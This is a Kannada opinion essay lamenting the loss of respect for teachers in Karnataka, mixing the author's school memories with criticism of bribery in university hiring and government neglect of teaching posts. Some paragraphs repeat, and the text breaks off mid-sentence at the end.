ಈಗ ಯಾವ ವೃತ್ತಿಗೆ ಗೌರವ ಇದೆ?

ಒಂದು ವೃತ್ತಿಗೆ ಗೌರವ ಬರುವುದು ಆ ವೃತ್ತಿಯಲ್ಲಿ ಕೆಲಸ ಮಾಡುವವರ ಪ್ರಾಮಾಣಿಕತೆಯಿಂದ, ನಿಷ್ಠೆಯಿಂದ, ಅವರು ಸಂಪಾದಿಸುವ ಪರಿಣತಿಯಿಂದ, ತೋರಿಸುವ ಶ್ರದ್ಧೆಯಿಂದ, ಬದ್ಧತೆಯಿಂದ, ರೂಢಿಸಿಕೊಳ್ಳುವ ಹಾಗೂ ಪ್ರತಿಪಾದಿಸುವ ಮೌಲ್ಯಗಳಿಂದ. ಈಗ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಬರುವ ಎಷ್ಟು ಜನರಲ್ಲಿ ಈ ಗುಣಗಳನ್ನು ಕಾಣಬಹುದು?

ನಾವು ಜೀವನದಲ್ಲಿ ನೆನಪಿಸಿಕೊಳ್ಳುವುದು ಇಬ್ಬರನ್ನು: ಒಬ್ಬಳು ತಾಯಿ, ಇನ್ನೊಬ್ಬರು ಶಿಕ್ಷಕ. ಇದು ನನ್ನ ಜೀವನಕ್ಕೂ ಅನ್ವಯಿಸುವ ಮಾತು. ಈಗ ನಾನು ಏನಾಗಿದ್ದೇನೆಯೋ ಅದಕ್ಕೆ ನನ್ನ ತಾಯಿ ಕಾರಣ ಹಾಗೂ ನನ್ನ ಶಿಕ್ಷಕರು ಕಾರಣ. ಹಾಗೆಂದು ನಾನು ಬಹಳ ಜನ ಶಿಕ್ಷಕರನ್ನು ನೆನಪಿಸಿಕೊಳ್ಳಲಾರೆ. ಇದು ಕೂಡ ಎಲ್ಲರ ವಿಚಾರದಲ್ಲಿಯೂ ನಿಜ. ಯಾರೋ ಒಬ್ಬಿಬ್ಬ ಗುರುಗಳು ಮಾತ್ರ ನಮ್ಮ ಜೀವನದಲ್ಲಿ ಗಾಢವಾಗಿ ಪರಿಣಾಮ ಬೀರಿರುತ್ತಾರೆ; ಅವರು ನಮ್ಮ ಇಡೀ ಜೀವನವನ್ನು ರೂಪಿಸುತ್ತಾರೆ.

ಒಬ್ಬ ಶಿಕ್ಷಕ ಒಬ್ಬ ವಿದ್ಯಾರ್ಥಿಯನ್ನು ಮಾತ್ರ ರೂಪಿಸುವುದಿಲ್ಲ; ಆತ ಒಂದು ಜನಾಂಗವನ್ನು ರೂಪಿಸುತ್ತಾನೆ. ತನ್ನ ಮೂವತ್ತು ಮೂವತ್ತೈದು ವರ್ಷಗಳ ಸೇವಾವಧಿಯಲ್ಲಿ ಅವನ ಕೈಯಲ್ಲಿ ಅನೇಕ ವಿದ್ಯಾರ್ಥಿಗಳು ಕಲಿಯುತ್ತಾರೆ. ಅವರೆಲ್ಲ ಆತ ಕಲಿಸಿದ್ದನ್ನು ಕಲಿತು ಜಾಣರಾದರೆ, ಒಳ್ಳೆಯವರಾದರೆ ಒಂದು ಒಳ್ಳೆಯ ಸಮಾಜ ನಿರ್ಮಾಣವಾಗುತ್ತದೆ, ಒಂದು ಸಮೃದ್ಧ ನಾಡು ನಿರ್ಮಾಣವಾಗುತ್ತದೆ. ಆದರೆ, ಅಷ್ಟು ಪವಿತ್ರವಾದ, ಜನಾಂಗಗಳನ್ನು ರೂಪಿಸುವ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ನೀಡಬೇಕಾದ ಗೌರವವನ್ನು ಸಮಾಜ ನೀಡಿದೆಯೇ ಎಂದರೆ ಆ ಪ್ರಶ್ನೆಗೆ ಸಕಾರಾತ್ಮಕ ಉತ್ತರ ಸಿಗುವುದು ಕಷ್ಟ.

ಉತ್ತರ ಕರ್ನಾಟಕದಲ್ಲಿ ಒಂದು ಗಾದೆ ಮಾತು ಇದೆ: ‘ಸಾಲಿ ಮಾಸ್ತರಗ ಬುದ್ಧಿ ಇಲ್ಲ; ಸ್ಟೇಷನ್ ಮಾಸ್ತರಗ ನಿದ್ದಿ ಇಲ್ಲ.’ ಈ ಗಾದೆ ಮಾತು ಏಕೆ ಹುಟ್ಟಿಕೊಂಡಿತು ಅರ್ಥ ಮಾಡಿಕೊಳ್ಳಲು ಎಂದು ನಾನು ಬಹಳ ಹೆಣಗಿರುವೆ. ಸ್ಟೇಷನ್ ಮಾಸ್ತರಗೆ ನಿದ್ದೆ ಇಲ್ಲದೇ ಇರುವುದು ಸಹಜವಾಗಿದೆ. ಏಕೆಂದರೆ ಬರುವ ರೈಲುಗಳಿಗಾಗಿ ಆತ, ರಾತ್ರಿಯಿಡೀ ಎಚ್ಚರವಿರಬೇಕು. ಆದರೆ, ‘ಸಾಲಿ ಮಾಸ್ತರಗೆ ಬುದ್ಧಿ ಇಲ್ಲ’ ಎಂದು ನಮ್ಮ ಸಮಾಜ ಏಕೆ ಭಾವಿಸಿತು? ನನಗೆ ಈ ಗಾದೆಗೆ ಉತ್ತರ ಸಿಕ್ಕಿಲ್ಲ. ಆದರೆ, ನಮ್ಮ ಸಮಾಜ ಶಾಲಾ ಶಿಕ್ಷಕರನ್ನು ಗೌರವದಿಂದ ಕಂಡಿಲ್ಲ ಎಂಬುದನ್ನು ಮಾತ್ರ ಈ ಗಾದೆ ಮಾತು ಸ್ಪಷ್ಟವಾಗಿ ಸಾಬೀತು ಮಾಡುತ್ತದೆ.

ವಿಶ್ವವಿದ್ಯಾಲಯ ಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನೂ ‘ಗೆಜೆಟೆಡ್’ ಎಂದು ಪರಿಗಣಿಸಿಲ್ಲ! ಪ್ರಾಥಮಿಕ ಶಾಲಾ ಶಿಕ್ಷಕರು ಬರೀ ಪಾಠ ಮಾಡುವುದಕ್ಕೆ ಮಾತ್ರವಲ್ಲ ಉಳಿದ ಇಪ್ಪತ್ತೆಂಟು ಕೆಲಸಕ್ಕೂ ಅವರೇ ಬೇಕು ಎಂಬ ಮನಃಸ್ಥಿತಿಯಲ್ಲಿ ಸರ್ಕಾರ ಇದೆ.

ವಸಾಹತುಶಾಹಿ ವ್ಯವಸ್ಥೆಯಡಿ ಬೆಳೆದುಬಂದ ನಮ್ಮ ಮನಃಸ್ಥಿತಿಗೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ದೊಡ್ಡದು ಎನಿಸಿಲ್ಲ. ನಮಗೆ ಮಾಮಲೇದಾರ, ಫೌಜದಾರ, ಕಲೆಕ್ಟರ್, ಮುನ್ಸೀಫ ದೊಡ್ಡವರು… ಸರ್ಕಾರ ಕೂಡ ಪ್ರಾಥಮಿಕ ಶಾಲಾ ಶಿಕ್ಷಕರನ್ನು ‘ಸಿ’ ದರ್ಜೆ ಸಿಬ್ಬಂದಿ ಎಂದೇ ಗುರುತಿಸಿದೆ. ವಿಶ್ವವಿದ್ಯಾಲಯ ಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನೂ ‘ಗೆಜೆಟೆಡ್’ ಎಂದು ಪರಿಗಣಿಸಿಲ್ಲ! ಪ್ರಾಥಮಿಕ ಶಾಲಾ ಶಿಕ್ಷಕರು ಬರೀ ಪಾಠ ಮಾಡುವುದಕ್ಕೆ ಮಾತ್ರವಲ್ಲ ಉಳಿದ ಇಪ್ಪತ್ತೆಂಟು ಕೆಲಸಕ್ಕೂ ಅವರೇ ಬೇಕು ಎಂಬ ಮನಃಸ್ಥಿತಿಯಲ್ಲಿ ಸರ್ಕಾರ ಇದೆ.

ಒಂದು ಹುದ್ದೆಗೆ ಅದಕ್ಕೆ ಇರುವ ಸ್ಥಾನಮಾನದ ಮೇಲೆ ಗೌರವ ಬರುತ್ತದೆ. ಶಿಕ್ಷಕ ವೃತ್ತಿ ದೊಡ್ಡದು ಎಂದು ಸರ್ಕಾರಕ್ಕೂ ಅನಿಸಿಲ್ಲ. ಮೇಲು ಹಂತಕ್ಕೆ ಹೋದಂತೆ ಅದು ಅತ್ಯಂತ ಅನುತ್ಪಾದಕ ಹುದ್ದೆ ಎಂಬ ಭಾವನೆಯೂ ಸರ್ಕಾರಕ್ಕೆ ಇದೆ. ಕಾಲೇಜು ಹಾಗೂ ವಿಶ್ವವಿದ್ಯಾಲಯ ಮಟ್ಟದಲ್ಲಿ ಕಾಯಂ ಉಪನ್ಯಾಸಕರು ನೇಮಕವಾಗದೇ ಇಡೀ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಅತಿಥಿ ಉಪನ್ಯಾಸಕರ ಮೇಲೆಯೇ ನಡೆಯುತ್ತಿರುವಾಗ ಒಟ್ಟು ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಸರ್ಕಾರ ಹೇಗೆ ಟ್ರೀಟ್ಮಾಡುತ್ತಿದೆ ಎಂದು ನಾವು ಊಹಿಸಬಹುದು.

ಇಂಥ ಒಂದು ಅನಾದರ ಹಾಗೂ ಅನುದಾರ ವ್ಯವಸ್ಥೆಯ ನಡುವೆ ಅನೇಕ ಶಿಕ್ಷಕರು ಬಹಳ ಶ್ರದ್ಧೆಯಿಂದ, ಭಕ್ತಿಯಿಂದ, ‘ಇದು ಜನಾಂಗಗಳನ್ನು ರೂಪಿಸುವ ಕೆಲಸ’ ಎಂದು ಪಾಠ ಮಾಡಿದ್ದಾರೆ. ನನಗೆ ಅಂಥ ಶಿಕ್ಷಕರು ಕಲಿಕೆಯ ಎಲ್ಲ ಹಂತದಲ್ಲಿ ಸಿಕ್ಕಿದ್ದರು.

ಗ್ರಂಥಾಲಯಕ್ಕೆ ಹೋಗಿ ಓದುವ ಹವ್ಯಾಸ ಬೆಳೆಸಿದರು. ತಮ್ಮ ಶ್ರೇಷ್ಠ ಚಾರಿತ್ರ್ಯದಿಂದ ನಮಗೂ ಚಾರಿತ್ರ್ಯವಂತರಾಗುವ ಮಹತ್ವವನ್ನು ತಿಳಿಸಿದರು. ಆಗಿನ ವಯಸ್ಸಿನಲ್ಲಿಯೇ ಉಳಿತಾಯದ ಮಹತ್ವವನ್ನು ಹೇಳಿಕೊಟ್ಟರು. ನಿಮ್ಮ ಆತ್ಮಸಾಕ್ಷಿಗೆ ಯಾವಾಗಲೂ ಮೋಸ ಮಾಡಬೇಡಿರಿ ಎಂದು ತಿಳಿಸಿಕೊಟ್ಟರು.

ಪ್ರಾಥಮಿಕ ಹಂತದಲ್ಲಿ ವಿದ್ಯಾಭ್ಯಾಸ ಕಲಿಸಿದ ಗುರುಗಳ ಬಗೆಗೆ ನನಗೆ ಹೆಚ್ಚು ನೆನಪುಗಳು ಇಲ್ಲ. ಪ್ರೌಢ ಶಿಕ್ಷಣದ ಹಂತದಲ್ಲಿ ಇತಿಹಾಸ, ವಿಜ್ಞಾನ, ಕನ್ನಡ, ಸಂಸ್ಕೃತ, ಇಂಗ್ಲಿಷ್ ವಿಷಯಗಳ ಪಾಠ ಮಾಡುತ್ತಿದ್ದ ಅನೇಕ ಶಿಕ್ಷಕರು ನಮಗೆ ಪಠ್ಯಕ್ರಮದ ಜೊತೆಗೆ ಜೀವನದ ಪಾಠಗಳನ್ನು ಕಲಿಸಿದರು. ‘ಧರ್ಮೋ ರಕ್ಷತಿ ರಕ್ಷಿತಃ’ ಎಂದು ಹೇಳಿಕೊಟ್ಟರು. ಆಗಿನ ಕಾಲದಲ್ಲಿ ಬಸ್ ಡ್ರೈವರ್, ಕಂಡಕ್ಟರ್ ಆಗುವುದೇ ದೊಡ್ಡದು ಎಂಬ ಮನೋಭಾವ ಇದ್ದ ಗ್ರಾಮೀಣ ಹಾಗೂ ಬಡತನದ ಹಿನ್ನೆಲೆಯಿಂದ ಬಂದ ನಮ್ಮಂಥ ಹುಡುಗರ ಬಾಯಿಯಲ್ಲಿ ‘ನಾನು ರಾಷ್ಟ್ರಪತಿ ಆಗುತ್ತೇನೆ’ (ಹೀಗೆ ಹೇಳಿದವನು ನಾನಲ್ಲ! ಹಾಗೆ ಹೇಳಿದವನು ಮುಂದೆ ಎಂಜಿನಿಯರ್ ಆಗಿ ನಿವೃತ್ತನಾದ) ಎಂದು ಹೇಳುವಂಥ ಮಹತ್ವಾಕಾಂಕ್ಷೆಯನ್ನು ಬಿತ್ತಿದರು. ತಪ್ಪಿಲ್ಲದೇ ಬರೆಯುವ ಕನ್ನಡವನ್ನು ಕಲಿಸಿದರು. ಗ್ರಂಥಾಲಯಕ್ಕೆ ಹೋಗಿ ಓದುವ ಹವ್ಯಾಸ ಬೆಳೆಸಿದರು. ತಮ್ಮ ಶ್ರೇಷ್ಠ ಚಾರಿತ್ರ್ಯದಿಂದ ನಮಗೂ ಚಾರಿತ್ರ್ಯವಂತರಾಗುವ ಮಹತ್ವವನ್ನು ತಿಳಿಸಿದರು. ಆಗಿನ ವಯಸ್ಸಿನಲ್ಲಿಯೇ ಉಳಿತಾಯದ ಮಹತ್ವವನ್ನು ಹೇಳಿಕೊಟ್ಟರು. ನಿಮ್ಮ ಆತ್ಮಸಾಕ್ಷಿಗೆ ಯಾವಾಗಲೂ ಮೋಸ ಮಾಡಬೇಡಿರಿ ಎಂದು ತಿಳಿಸಿಕೊಟ್ಟರು.

ನಾವು ಹೈಸ್ಕೂಲಿಗೆ ಹೋಗುತ್ತಿದ್ದ ಅರವತ್ತರ ದಶಕದಲ್ಲಿ ಹುಡುಗರು ಚಹಾದ ಅಂಗಡಿಗೆ ಹೋಗುವುದು ಅತ್ಯಂತ ಅನೈತಿಕ ಕೆಲಸ ಎಂದು ನಮ್ಮ ಹಿರಿಯರು ಭಾವಿಸುತ್ತಿದ್ದರು. ಹಾಗೆಂದು ನಾವು ಚಹಾದ ಅಂಗಡಿಗೆ ಹೋಗುತ್ತಿರಲಿಲ್ಲ ಎಂದು ಅಲ್ಲ. ಶಿಕ್ಷಕರ, ಹಿರಿಯರ ಕಣ್ಣು ತಪ್ಪಿಸಿ ಹೋಗುತ್ತಿದ್ದೆವು. ಅವರು ಎದುರು ಬಂದರೆ ಬೇರೆ ದಾರಿ ಹಿಡಿಯುತ್ತಿದ್ದೆವು. ಮುಂದೆ ಕಾಲೇಜಿಗೆ ಹೋದಾಗಲೂ, ಗುರುಗಳಿಗೆ ಹೆದರಿ, ಹುಡುಗಿಯರ ಜೊತೆ ಮಾತನಾಡಬೇಕು ಎಂಬ ಆಸೆಯನ್ನು ಬಲವಂತದಿಂದ ಹತ್ತಿಕ್ಕಿಕೊಳ್ಳುತ್ತಿದ್ದೆವು. ಇದು ವಿಶ್ವವಿದ್ಯಾಲಯಕ್ಕೆ ಹೋದಾಗಲೂ ಬದಲಾಗಲಿಲ್ಲ. ಹುಡುಗರು-ಹುಡುಗಿಯರು ಸದರವಾಗಿದ್ದರೆ ದಾರಿ ತಪ್ಪುತ್ತಾರೆ, ಗುರಿ ತಪ್ಪಿಸಿಕೊಳ್ಳುತ್ತಾರೆ ಎಂದು ಆಗಿನ ಶಿಕ್ಷಕರಿಗೆ ಅನಿಸುತ್ತಿತ್ತು.

ಇದೇ ಗೌರವವನ್ನು ಎಲ್ಲ ಹುಡುಗರೂ ಎಲ್ಲ ಶಿಕ್ಷಕರಿಗೂ ಕೊಡುತ್ತಿದ್ದರೇ ಎಂದು ಕೇಳಿದರೆ ಇಲ್ಲ ಎಂದೇ ಉತ್ತರ ಕೊಡಬೇಕಾಗುತ್ತದೆ. ಕಿವಿಯಲ್ಲಿ ಕೂದಲು ಇದ್ದ ಒಬ್ಬ ಶಿಕ್ಷಕರಿಗೆ ನಮಗಿಂತ ಚಿಕ್ಕ ಹುಡುಗರು ಏನು ಅಡ್ಡ ಹೆಸರು ಇಟ್ಟಿದ್ದರು ಎಂಬುದನ್ನು ನಾನು ಇಲ್ಲಿ ಬರೆಯಲಾಗದು. ನಾವು ಕಾಲೇಜಿಗೆ ಬಂದಿದ್ದಾಗಲೇ ನಮ್ಮ ಕೆಲವರು ಹಿರಿಯ ವಿದ್ಯಾರ್ಥಿಗಳು ನಮ್ಮ ಗುರುಗಳ ಜೊತೆಗೆ ಸಿಗರೇಟು ಸೇದುತ್ತಿದ್ದರು, ಪರಸ್ಪರರ ಬಳಿ ಕಡ್ಡಿಪೆಟ್ಟಿಗೆ ಕೇಳುತ್ತಿದ್ದರು ಎಂದು ತಿಳಿದು ನಾವು ಬೆಚ್ಚಿ ಬಿದ್ದಿದ್ದೆವು. ಗುರು ಶಿಷ್ಯ ಸಂಬಂಧ ಸಡಿಲಗೊಂಡುದು ಆಗಲೇ. ಅಂದರೆ ಸುಮಾರು, ನಾಲ್ಕು ದಶಕಗಳ ಹಿಂದೆಯೇ.

ಈಗ, ಶಿಕ್ಷಕರು ಹೀಗೆ ವಿದ್ಯಾರ್ಥಿಯನ್ನು ದಂಡಿಸಬಹುದೇ? ‘ವಿದ್ಯಾರ್ಥಿಗಳ ದೈಹಿಕ ದಂಡನೆ ಸಲ್ಲದು’ ಎಂದು ಪತ್ರಿಕೆಗಳು ಸಂಪಾದಕೀಯ ಬರೆಯಲು ಆರಂಭಿಸಿ ಎಷ್ಟು ವರ್ಷಗಳಾದುವು? ಕೈಯಲ್ಲಿ ದಂಡವಿಲ್ಲದ ಗುರುವಿನ ಬಗೆಗೆ ಮಕ್ಕಳಿಗೆ ಯಾವ ಭಯ? ಯಾವ ಭಕ್ತಿ? ಬರೀ ತನ್ನ ಕಲಿಸುವ ಸಾಮಥ್ರ್ಯದಿಂದಲೇ ವಿದ್ಯಾರ್ಥಿಗಳಿಂದ ಗೌರವ ಸಂಪಾದಿಸುವ ಶಿಕ್ಷಕರು ಈಗ ಎಷ್ಟು ಮಂದಿ? ನಾನು ಕಾಲೇಜಿನಲ್ಲಿ ಓದುತಿದ್ದ ಎಪ್ಪತ್ತರ ದಶಕದಲ್ಲಿಯೇ ನನ್ನ ತುಂಟತನ ಕಂಡು, ‘ನೀವು ನನ್ನ ತರಗತಿಗೆ ಬರುವುದು ಬೇಡ.

‘ದಂಡಂ ದಶಗುಣಂ’ ಎಂದ ಆರ್ಷೇಯ ಪದ್ಧತಿಗೆ ಸೇರಿದವರು ನಾವು. ನಾನು ಸ್ವತಃ ಗುರುಗಳಿಂದ ಏಟು ತಿಂದಿದ್ದೇನೆ. ಚಡ್ಡಿಯಲ್ಲಿ ಉಚ್ಚೆ ಹೊಯ್ದುಕೊಂಡಿದ್ದೇನೆ. ಅದರಿಂದ ಆಗ ನನಗೆ ಅವಮಾನ ಅನಿಸಿತ್ತು ಎಂಬುದು ನಿಜ. ಆದರೆ, ಅದು ತಪ್ಪು ಎಂದು ಈಗಲೂ ಹೇಳಲಾರೆ. ನಾನು ಏನೋ ತುಂಟತನ ಮಾಡಿದ್ದೆ ಎಂದು ಅವರಿಗೆ ಅನಿಸಿತ್ತು. ಅವರು ತಮ್ಮ ಕೊಠಡಿಗೆ ಕರೆದು ನನಗೆ ಹೊಡೆದಿದ್ದರು. ಈಗ, ಶಿಕ್ಷಕರು ಹೀಗೆ ವಿದ್ಯಾರ್ಥಿಯನ್ನು ದಂಡಿಸಬಹುದೇ? ‘ವಿದ್ಯಾರ್ಥಿಗಳ ದೈಹಿಕ ದಂಡನೆ ಸಲ್ಲದು’ ಎಂದು ಪತ್ರಿಕೆಗಳು ಸಂಪಾದಕೀಯ ಬರೆಯಲು ಆರಂಭಿಸಿ ಎಷ್ಟು ವರ್ಷಗಳಾದುವು? ಕೈಯಲ್ಲಿ ದಂಡವಿಲ್ಲದ ಗುರುವಿನ ಬಗೆಗೆ ಮಕ್ಕಳಿಗೆ ಯಾವ ಭಯ? ಯಾವ ಭಕ್ತಿ? ಬರೀ ತನ್ನ ಕಲಿಸುವ ಸಾಮಥ್ರ್ಯದಿಂದಲೇ ವಿದ್ಯಾರ್ಥಿಗಳಿಂದ ಗೌರವ ಸಂಪಾದಿಸುವ ಶಿಕ್ಷಕರು ಈಗ ಎಷ್ಟು ಮಂದಿ? ನಾನು ಕಾಲೇಜಿನಲ್ಲಿ ಓದುತಿದ್ದ ಎಪ್ಪತ್ತರ ದಶಕದಲ್ಲಿಯೇ ನನ್ನ ತುಂಟತನ ಕಂಡು, ‘ನೀವು ನನ್ನ ತರಗತಿಗೆ ಬರುವುದು ಬೇಡ. ನಿಮಗೆ ನಾನು ಹಾಜರಿ ಕೊಡುವೆ’ ಎಂದು ಒಬ್ಬಿಬ್ಬರು ಶಿಕ್ಷಕರು ನನಗೆ ಹೇಳಿದ್ದರು. ಅಂದರೆ ಶಿಕ್ಷಕರ ಮಟ್ಟ ಆಗಲೇ ಕುಸಿಯಲು ಆರಂಭಿಸಿತ್ತು ಎಂದು ಭಾವಿಸಲು ಅಡ್ಡಿಯಿಲ್ಲ.

ಅದು ಬಹಳ ಮಹತ್ವದ ಕಾಲಘಟ್ಟ ಎಂದು ನನಗೆ ಅನಿಸುತ್ತದೆ. ಎಂಜಿನಿಯರಿಂಗ್, ವೈದ್ಯಕೀಯದಂಥ ವೃತ್ತಿ ಶಿಕ್ಷಣಕ್ಕೆ ಒತ್ತು ಸಿಕ್ಕ ಕೂಡಲೇ ಸಮಾಜದ ಕೆನೆ ಎನ್ನುವಂಥ ವಿದ್ಯಾರ್ಥಿಗಳು ಆ ಕಡೆ ಹೊರಟುಹೋದರು. ‘ಬೀಕಲು’ ಎನ್ನುವಂಥ ವಿದ್ಯಾರ್ಥಿಗಳು ಉಳಿದ ಶಿಕ್ಷಣ ಕ್ರಮಕ್ಕೆ ಬರಲು ತೊಡಗಿದರು. ಅದರ ಜೊತೆಗೆ, 70ರ ದಶಕದ ಕೊನೆಗಾಲದಲ್ಲಿ ಕಾಲೇಜುಗಳ ಉಪನ್ಯಾಸಕ ಹುದ್ದೆ ಹಿಡಿಯುವುದು ಬಹಳ ಕಷ್ಟವಾಯಿತು. ಆಗಲೇ ವಂತಿಗೆ ಆರಂಭವಾಗಿತ್ತು. ಆಗ ಕಾಲೇಜಿನ ಉಪನ್ಯಾಸಕ ಹುದ್ದೆ ಹಿಡಿಯಲು ಮೂವತ್ತರಿಂದ ನಲವತ್ತು ಸಾವಿರ ರೂಪಾಯಿ ವಂತಿಗೆಯನ್ನು ಕಾಲೇಜಿನ ಆಡಳಿತ ವರ್ಗಕ್ಕೆ ಕೊಡಬೇಕಿತ್ತು.

ಈಗ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಸಹಾಯಕ ಪ್ರಾಧ್ಯಾಪಕರ ನೇಮಕಕ್ಕೆ ಮೂವತ್ತರಿಂದ ಐವತ್ತು ಲಕ್ಷದ ವರೆಗೆ ಲಂಚ ಕೊಡುವ ಖಚಿತ ಮಾಹಿತಿ ನನ್ನ ಬಳಿ ಇದೆ. ಮಧ್ಯ ಕರ್ನಾಟಕದ ಒಂದೆರಡು ವಿಶ್ವವಿದ್ಯಾಲಯಗಳಲ್ಲಿ ಈಚೆಗೆ ಆದ ನೇಮಕಕ್ಕೆ ಅಲ್ಲಿನ ಕುಲಪತಿಗಳು ಲಂಚ ತೆಗೆದುಕೊಂಡ ‘ಕಾರ್ಯಾಚರಣೆಯ’ ವಿವರ ತಿಳಿದು ನನಗೆ ದಿಗ್ಭ್ರಮೆ ಆಗಿದೆ. ಹಾಗೆ ಲಂಚ ಕೊಟ್ಟವರು ಅರ್ಹರೇ, ಅನರ್ಹರೇ, ಅವರಿಗೆ ಪಾಠ ಮಾಡುವ ಯೋಗ್ಯತೆ ಇದೆಯೇ ಇಲ್ಲವೇ? ಹೇಗೆ ಹೇಳುವುದು? ವಿದ್ಯಾರ್ಥಿಗಳು ಯಾವಾಗಲೂ ಗೌರವಿಸುವುದು ಪಾಠ ಮಾಡುವ ಸಾಮಥ್ರ್ಯ ಇದ್ದವರನ್ನು. ಅಂಥವರ ಸಂಖ್ಯೆ ಕಡಿಮೆ ಆಗಿ ಬಹಳ ವರ್ಷಗಳು ಕಳೆದುವು. ನಮ್ಮ ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ನಮಗೆ ಪಾಠ ಮಾಡಿದವರ ಪೈಕಿ ನಾನು ನೆನಪು ಇಟ್ಟುಕೊಂಡುದು ಒಬ್ಬರನ್ನೋ, ಇಬ್ಬರನ್ನೋ. ಹಾಗಾದರೆ ಅದು ಏನನ್ನು ತೋರಿಸುತ್ತದೆ? ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ನನಗೆ ಕಲಿಸಿದ ಎಂ.ಎಂ.ಕಲಬುರ್ಗಿಯವರು ನಾನು ಸಿಕ್ಕಾಗಲೆಲ್ಲ, ‘ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ಇರಬೇಕಾದವರು ಹೊರಗೆ ಇದ್ದಾರೆ, ಹೊರಗೆ ಇರಬೇಕಾದವರು ಒಳಗೆ ಇದ್ದಾರೆ’ ಎಂದು ಹೇಳುತ್ತಿದ್ದರು.

ನಿವೃತ್ತರಾದವರ, ಸೇವೆಯಲ್ಲಿ ಇರುವಾಗಲೇ ನಿಧನರಾದವರ ಹುದ್ದೆಗಳನ್ನು ತುಂಬಿಕೊಳ್ಳಲು ಅನುಮತಿ ಕೊಡುತ್ತಿಲ್ಲ. ನಿನ್ನೆ ಎಂ.ಎ. ಮುಗಿಸಿದವರೇ ಇಂದು ಅದೇ ಎಂ.ಎ. ತರಗತಿಗಳಿಗೆ ಅತಿಥಿ ಉಪನ್ಯಾಸಕರಾಗಿ ಪಾಠ ಮಾಡುವ ಸನ್ನಿವೇಶ ನಿರ್ಮಾಣವಾಗಿ ದಶಕಗಳು ಕಳೆದಿವೆ.

ಆದರೆ, ಈಗ ಸರ್ಕಾರಗಳು ಕಳೆದ ಸುಮಾರು ಹತ್ತು ಹನ್ನೆರಡು ವರ್ಷಗಳಿಂದ ಎಲ್ಲ ಕಾಲೇಜುಗಳ, ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಅನುದಾನಿತ ಹುದ್ದೆಗಳನ್ನು ಭರ್ತಿ ಮಾಡಿಕೊಳ್ಳಲು ಒಪ್ಪುತ್ತಿಲ್ಲ. ನಿವೃತ್ತರಾದವರ, ಸೇವೆಯಲ್ಲಿ ಇರುವಾಗಲೇ ನಿಧನರಾದವರ ಹುದ್ದೆಗಳನ್ನು ತುಂಬಿಕೊಳ್ಳಲು ಅನುಮತಿ ಕೊಡುತ್ತಿಲ್ಲ. ನಿನ್ನೆ ಎಂ.ಎ. ಮುಗಿಸಿದವರೇ ಇಂದು ಅದೇ ಎಂ.ಎ. ತರಗತಿಗಳಿಗೆ ಅತಿಥಿ ಉಪನ್ಯಾಸಕರಾಗಿ ಪಾಠ ಮಾಡುವ ಸನ್ನಿವೇಶ ನಿರ್ಮಾಣವಾಗಿ ದಶಕಗಳು ಕಳೆದಿವೆ. ಅವರು ಏನು ಪಾಠ ಮಾಡುತ್ತಾರೆ ದೇವರಿಗೇ ಗೊತ್ತು. ಅವರಿಗೂ ಗತಿಯಿಲ್ಲ; ಇವರಿಗೂ ಗತಿಯಿಲ್ಲ ಎಂಬ ಸ್ಥಿತಿಯಲ್ಲಿ ಈಗ ಉನ್ನತ ಶಿಕ್ಷಣ ಇದೆ. ಹೀಗೆ ಕಲಿಸುವ ಗುರುವಿನ ಬಗೆಗೆ ವಿದ್ಯಾರ್ಥಿಗೆ ಎಂಥ ಗೌರವ ಇರಲು ಸಾಧ್ಯ? ಆತನ ಗೌರವ ಕಳೆದುಹೋಗಲು ಯಾರು ಕಾರಣ?

ಕರ್ನಾಟಕದ ಉದಾಹರಣೆಯನ್ನೇ ಗಮನಿಸುವುದಾದರೆ, ಪ್ರಾಥಮಿಕ, ಪ್ರೌಢ, ಪದವಿ ಹಾಗೂ ಸ್ನಾತಕೋತ್ತರ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ನಡುವೆ ಒಂದು ನಿರಂತರವಾದ ಕೊಂಡಿ ಇರುತ್ತದೆ ಎಂಬುದನ್ನು ಸರ್ಕಾರ ಮರೆತಿದೆ. ಬೇಕಾಬಿಟ್ಟಿ ಕಾಲೇಜು ಆರಂಭಿಸುವ ಸರ್ಕಾರ ಅಲ್ಲಿ ಸಿಬ್ಬಂದಿಯ ನೇಮಕದ ಮಹತ್ವನ್ನು ಮನಗಾಣುವುದಿಲ್ಲ. ಅದೇ ರೀತಿ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಸ್ಥಾಪನೆಗೂ ಸರ್ಕಾರಕ್ಕೆ ವಿಪರೀತ ಆತುರ. ಅವುಗಳಿಗೆ ಕುಲಪತಿಗಳ ನೇಮಕವೇ ದೊಡ್ಡ ವಿಚಾರ ಎನ್ನುವಂತೆ ಸರ್ಕಾರ ನಡೆದುಕೊಳ್ಳುತ್ತದೆ. ಅಂಥ ಬಹುತೇಕ ಕುಲಪತಿಗಳು ಹೇಗೆ ನೇಮಕವಾದರು ಮತ್ತು ಹೇಗೆ ನೇಮಕವಾಗುತ್ತಾರೆ ಎಂದು ನಮಗೆ ಗೊತ್ತಿದೆ. ಅಂಥ ಕುಲಪತಿಗಳನ್ನೇ ಡಕಾಯಿತರು, ದರೋಡೆಕೋರರು ಎಂದು ಹಿಂದಿನ ಸರ್ಕಾರದಲ್ಲಿ ಇದ್ದ ಉನ್ನತ ಶಿಕ್ಷಣ ಸಚಿವರು ಕರೆಯುತ್ತಿದ್ದರು. ತನ್ನ ಕುಲಪತಿಗಳ ಬಗೆಗೆ ಸರ್ಕಾರಕ್ಕೇ ಗೌರವ ಇಲ್ಲದೇ ಇದ್ದರೆ ಜನರಿಗೆ ಯಾವ ಗೌರವ ಇರುತ್ತದೆ? ಅವರ ಮಾನವನ್ನು ಸರ್ಕಾರ ಕಳೆಯಿತೇ? ಅವರೇ ಕಳೆದುಕೊಂಡರೇ? ದುರಂತ ಎಂದರೆ 